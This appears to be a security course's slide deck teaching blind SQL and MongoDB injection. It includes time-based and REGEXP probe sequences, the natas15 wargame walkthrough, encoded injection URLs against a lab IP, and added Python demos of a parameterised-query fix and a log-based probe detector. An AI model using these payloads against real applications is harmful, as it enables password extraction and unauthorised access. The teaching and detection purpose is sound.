A1 (Part 3): Injection - Blind SQL Injection (PowerPoint PPT Presentation)



SLIDE 1

A1 (Part 3): Injection Blind SQL Injection

SLIDE 2

Blind SQL Injection

SQL injection that tricks databases into revealing information by way of the success or failure of injected queries. Analogous example: a login prompt that stops if the username is not valid.

Must have login/password prompts that check for a valid pair.

Method

  • Employ a game of 20 questions
  • Use "SLEEP" with conditionals such as IF to reveal success or failure of a query
  • Utilize support for regular expressions in databases in queries
    • MySQL "LIKE" and "REGEXP"
    • NoSQL this.match(/^[0-9]$/)

SLIDE 3

SQL - IF, LIKE, SLEEP

  • IF in SQL can be used to find out if something is true: IF(CONDITION, TRUE_OUTCOME, FALSE_OUTCOME)
  • LIKE in SQL can be used to compare results using wildcards: % matches 0 or more characters; _ matches exactly one character
  • SLEEP in SQL halts the program/server for X seconds
  • IF(password LIKE BINARY "p4ssw0rd", sleep(5), null): if the password is (case sensitive) p4ssw0rd, sleep for 5 seconds. Otherwise, do nothing.

SLIDE 4

SQL – REGEXP

  • REGEXP in SQL can be used to match a regular expression. Similar to LIKE.
  • AND password REGEXP "^[a-z]" is true if the password begins with a lowercase character
  • Use in conjunction with SLEEP to probe correctness of password guesses
  • SQL code to add a delay if the password begins with foo:

 AND password COLLATE latin1_general_cs REGEXP "^foo" and (SLEEP(5)) AND "1"="1"

SLIDE 5

SQL – COUNT predicate

'COUNT(*)' returns the number of rows

  • IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_name = 'users') LIKE X, sleep(5), null)

  • If the number of rows in information_schema.columns whose table_name is users (i.e. the number of columns in the users table) is X, sleep for 5 seconds. Otherwise do nothing.

SLIDE 6

SQL Blind Injection example [Time Based]

SELECT password, is_admin FROM users WHERE username = 'bob' AND IF(password LIKE BINARY "%%", sleep(5), null) # ';
  -> 5 seconds before a response. Bob's password: %
SELECT password, is_admin FROM users WHERE username = 'bob' AND IF(password LIKE BINARY "a%", sleep(5), null) # ';
  -> 0.2 seconds before a response
SELECT password, is_admin FROM users WHERE username = 'bob' AND IF(password LIKE BINARY "b%", sleep(5), null) # ';
  -> 0.2 seconds before a response
SELECT password, is_admin FROM users WHERE username = 'bob' AND IF(password LIKE BINARY "c%", sleep(5), null) # ';
  -> 0.2 seconds before a response
SELECT password, is_admin FROM users WHERE username = 'bob' AND IF(password LIKE BINARY "d%", sleep(5), null) # ';
  -> 0.2 seconds before a response
SELECT password, is_admin FROM users WHERE username = 'bob' AND IF(password LIKE BINARY "p%", sleep(5), null) # ';
  -> 5 seconds before a response. Bob's password: p%
SELECT password, is_admin FROM users WHERE username = 'bob' AND IF(password LIKE BINARY "pa%", sleep(5), null) # ';
  -> 0.2 seconds before a response
SELECT password, is_admin FROM users WHERE username = 'bob' AND IF(password LIKE BINARY "pb%", sleep(5), null) # ';
  -> 0.2 seconds before a response
SELECT password, is_admin FROM users WHERE username = 'bob' AND IF(password LIKE BINARY "pc%", sleep(5), null) # ';
  -> 0.2 seconds before a response
SELECT password, is_admin FROM users WHERE username = 'bob' AND IF(password LIKE BINARY "p4%", sleep(5), null) # ';
  -> 5 seconds before a response. Bob's password: p4%
SELECT password, is_admin FROM users WHERE username = 'bob' AND IF(password LIKE BINARY "p4ssw0rd%", sleep(5), null) # ';
  -> 5 seconds before a response. Bob's password: p4ssw0rd%
SELECT password, is_admin FROM users WHERE username = 'bob' AND IF(password LIKE BINARY "p4ssw0rda%", sleep(5), null) # ';
  -> 0.2 seconds before a response
SELECT password, is_admin FROM users WHERE username = 'bob' AND IF(password LIKE BINARY "p4ssw0rdb%", sleep(5), null) # ';
  -> 0.2 seconds before a response
SELECT password, is_admin FROM users WHERE username = 'bob' AND IF(password LIKE BINARY "p4ssw0rdc%", sleep(5), null) # ';
  -> 0.2 seconds before a response
SELECT password, is_admin FROM users WHERE username = 'bob' AND IF(password LIKE BINARY "p4ssw0rd0%", sleep(5), null) # ';
  -> 0.2 seconds before a response
SELECT password, is_admin FROM users WHERE username = 'bob' AND IF(password LIKE BINARY "p4ssw0rd", sleep(5), null) # ';
  -> 5 seconds before a response. Bob's password: p4ssw0rd

SLIDE 7

Example: natas15.natas.labs.overthewire.org

Interface for checking if a user exists. If injectable, can use Blind SQL injection to obtain the password.

Try:
  • foo
  • natas16
  • natas16'
  • natas16"
  • natas16" OR "1"="1
  • natas16"#

SLIDE 8

natas15.natas.labs.overthewire.org

Find password for user natas16

/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/
if(array_key_exists("username", $_REQUEST)) {
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    $res = mysql_query($query, $link);
    if($res) {
        if(mysql_num_rows($res) > 0) {
            echo "This user exists.<br>";
        } else {
            echo "This user doesn't exist.<br>";
        }
    } else {
        echo "Error in query.<br>";
    }
}
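Added example, not part of the slides or of the natas source above: the same user-exists lookup rebuilt in Python on an in-memory SQLite database, once with the request value spliced into the SQL text as the PHP does, and once as a parameterised query. It shows why the second form closes the oracle: the same injected username that makes the concatenated query answer "This user exists." is treated as one literal (non-existent) username by the parameterised query. The table rows are constructed, the natas16 password is a placeholder, and the demo quotes the username with single quotes rather than the PHP's double quotes (an adaptation to SQLite), so the probe string is adjusted accordingly. SQLite has no built-in REGEXP, so one is registered from Python's re module.

```python
"""Concatenated vs. parameterised lookup on SQLite (added demo, constructed data)."""
import re
import sqlite3

# Constructed sample rows; the natas16 password is a placeholder, not the real one.
SAMPLE_USERS = [("natas16", "Wa_placeholder_password"), ("alice", "hunter2")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    # SQLite evaluates "X REGEXP Y" as regexp(Y, X): pattern first, value second.
    conn.create_function("REGEXP", 2, lambda pat, val: re.search(pat, val) is not None)
    conn.execute("CREATE TABLE users (username VARCHAR(64), password VARCHAR(64))")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def user_exists_vulnerable(conn: sqlite3.Connection, username: str) -> str:
    # Mirrors the PHP: the request value becomes part of the SQL text, so a
    # quote followed by AND ... REGEXP ... turns the lookup into a yes/no oracle.
    query = "SELECT * FROM users WHERE username='" + username + "'"
    rows = conn.execute(query).fetchall()
    return "This user exists." if rows else "This user doesn't exist."


def user_exists_fixed(conn: sqlite3.Connection, username: str) -> str:
    # Parameterised: the driver binds the value separately from the statement,
    # so quotes, AND and REGEXP inside it are just characters of a username.
    rows = conn.execute("SELECT * FROM users WHERE username = ?", (username,)).fetchall()
    return "This user exists." if rows else "This user doesn't exist."


if __name__ == "__main__":
    db = make_db()
    probe = "natas16' AND password REGEXP '^W"   # slide 9 probe, single-quoted
    print("concatenated :", user_exists_vulnerable(db, probe))   # This user exists.
    print("parameterised:", user_exists_fixed(db, probe))        # This user doesn't exist.
```

The parameterised lookup still reveals whether a username exists, which is what the page is built to do; what it no longer reveals is anything about other columns, because the input can no longer change the shape of the query.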

SLIDE 9

Example: natas15 (simplified)

Search list: [0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]

Injected username: natas16" AND password REGEXP "^[0123456789ABCDEFGHIJKLMNOPQRSTU]
Received: User does not exist
Injected username: natas16" AND password REGEXP "^[VWXYZabcdefghij]
Received: This user exists
Injected username: natas16" AND password REGEXP "^[VWXYZab]
Received: This user exists
Injected username: natas16" AND password REGEXP "^[VWX]
Received: This user exists
Injected username: natas16" AND password REGEXP "^[V]
Received: User does not exist
Injected username: natas16" AND password REGEXP "^[W]
Received: This user exists

Password so far: W

SLIDE 10

Example: natas15

Search list: [0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]

Password so far: W

Injected username: natas16" AND password REGEXP "^W[0123456789ABCDEFGHIJKLMNOPQRSTU]
Received: User does not exist
Injected username: natas16" AND password REGEXP "^W[YZ]
Received: User does not exist
Injected username: natas16" AND password REGEXP "^W[VWXYZabcdefghij]
Received: This user exists
Injected username: natas16" AND password REGEXP "^W[VWXYZab]
Received: This user exists
Injected username: natas16" AND password REGEXP "^W[VWX]
Received: User does not exist
Injected username: natas16" AND password REGEXP "^W[a]
Received: This user exists

Password so far: Wa

Injected username: natas16" AND password REGEXP "^Wa[0123456789ABCDEFGHIJKLMNOPQRSTU]
Received: This user exists

SLIDE 11

Program #1

  • Write a program that leverages SQL injection in MongoDB to find the password for account admin
  • Done via injection into an HTTP GET parameter
  • Use binary search on alphanumeric characters
  • Use python requests (Beautiful Soup for parsing)

SLIDE 12

Program #1

Regexp to match all passwords: this.password.match(/^.*/)

Add MongoDB comment and inject:

?search=admin' && this.password.match(/^.*/)//

Then put into URL and URL-encode:

http://131.252.220.62/mongodb/example2/?search=admin%27%20%26%26%20this.password.match(%2F%5e.*%2F)%2F%2F

Only match if the first char of the password is a capital letter or digit:

http://131.252.220.62/mongodb/example2/?search=admin%27%20%26%26%20this.password.match(%2F%5e%5bA-Z0-9%5d.*%2F)%2F%2F

Only match if the first char of the password is a lowercase letter:

http://131.252.220.62/mongodb/example2/?search=admin%27%20%26%26%20this.password.match(%2F%5e%5ba-z%5d.*%2F)%2F%2F

SLIDE 13

Program #1: Sample output

% python3 MongoDB2.py
http://localhost:8000/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^%5B0123456789ABCDEFGHIJKLMNOPQRSTU%5D.*/)//+%00
no match.
http://localhost:8000/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^%5BVWXYZabcdefghij%5D.*/)//+%00
matched!
http://localhost:8000/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^%5BVWXYZab%5D.*/)//+%00
no match.
http://localhost:8000/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^%5Bcdef%5D.*/)//+%00
no match.
http://localhost:8000/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^%5Bgh%5D.*/)//+%00
no match.
http://localhost:8000/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^%5Bi%5D.*/)//+%00
matched!
current pass: i
http://localhost:8000/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^i%5B0123456789ABCDEFGHIJKLMNOPQRSTU%5D.*/)//+%00
no match.
http://localhost:8000/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^i%5BVWXYZabcdefghij%5D.*/)//+%00
matched!
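Added example, not part of the slides: the log-side view of the probes shown on slide 6 (time-based SLEEP), slides 9 and 10 (REGEXP oracle) and slides 12 and 13 (MongoDB JavaScript match). Every one of these techniques leaves its operator in the URL-decoded query string, and the time-based variant also leaves a request time close to the SLEEP argument, so a defender can flag both from an ordinary access log. The log format (combined log format plus a trailing request-time column in seconds, as nginx's $request_time), the signature names, the 4-second threshold and the six log lines are all constructed for this demo.

```python
"""Flag blind-injection probes in access-log lines (added demo, constructed data)."""
import re
from urllib.parse import unquote_plus

# Constructed format: ip - - [ts] "METHOD path PROTO" status size request_time
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) (?P<rt>[\d.]+)$'
)

# Signatures are matched against the URL-decoded query string.  The REGEXP and
# LIKE BINARY patterns require a following quote so that ordinary search text
# such as "regexp tutorial" is not flagged.
SIGNATURES = {
    "sql-time-based":   re.compile(r"\bsleep\s*\(", re.I),
    "sql-regexp-probe": re.compile(r"\bregexp\s*['\"]|\blike\s+binary\s*['\"]", re.I),
    "sql-schema-enum":  re.compile(r"information_schema", re.I),
    "mongo-js-probe":   re.compile(r"this\.\w+\.match\s*\(|&&\s*this\.", re.I),
}

SLOW_SECONDS = 4.0  # a SLEEP(5) that fired shows up as roughly 5 s of request time

# Constructed sample log: one normal login, two SLEEP probes (one that slept,
# one that did not), one REGEXP probe, one MongoDB probe and one benign search.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /login?user=bob&pass=secret HTTP/1.1" 200 512 0.210',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /login?user=bob%27%20AND%20IF(password%20LIKE%20BINARY%20%22p%25%22,%20sleep(5),%20null)%20%23 HTTP/1.1" 200 512 5.032',
    '10.0.0.9 - - [01/Jan/2024:10:00:08 +0000] "GET /login?user=bob%27%20AND%20IF(password%20LIKE%20BINARY%20%22q%25%22,%20sleep(5),%20null)%20%23 HTTP/1.1" 200 512 0.198',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?username=natas16%22%20AND%20password%20REGEXP%20%22%5EW HTTP/1.1" 200 300 0.150',
    '10.0.0.7 - - [01/Jan/2024:10:00:10 +0000] "GET /mongodb/example2/?search=admin%27%26%26%20this.password.match(/%5E%5Bi%5D.*/)//+%00 HTTP/1.1" 200 300 0.120',
    '10.0.0.5 - - [01/Jan/2024:10:00:11 +0000] "GET /search?q=sleeping%20regexp%20tutorial HTTP/1.1" 200 900 0.300',
]


def parse_line(line: str):
    """Return a dict with ip, path, decoded query and float request time, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["path"].partition("?")
    rec["path"] = path
    rec["query"] = unquote_plus(query)   # %27 -> ', %26 -> &, + -> space, ...
    rec["rt"] = float(rec["rt"])
    return rec


def analyse(lines):
    """Return (ip, path, sorted signature names) for every line that matches a signature."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = [name for name, rx in SIGNATURES.items() if rx.search(rec["query"])]
        # A SLEEP in the query plus a slow response means the condition was true.
        if "sql-time-based" in hits and rec["rt"] >= SLOW_SECONDS:
            hits.append("confirmed-delay")
        if hits:
            findings.append((rec["ip"], rec["path"], sorted(hits)))
    return findings


def probe_burst(findings, threshold: int = 2):
    """IPs with at least `threshold` flagged requests.  A character-at-a-time
    search needs many requests, so volume per client is the strongest signal."""
    counts = {}
    for ip, _, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for hit in analyse(SAMPLE_LOG):
        print(hit)
    print("bursting clients:", probe_burst(analyse(SAMPLE_LOG)))
```

The per-request signatures are cheap but easy to evade with encoding or synonyms; the per-client count in probe_burst is the more robust signal, because the 20-questions approach on slides 9, 10 and 13 cannot avoid sending one request per guess.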

SLIDE 14

Questions

  • https://sayat.me/wu4f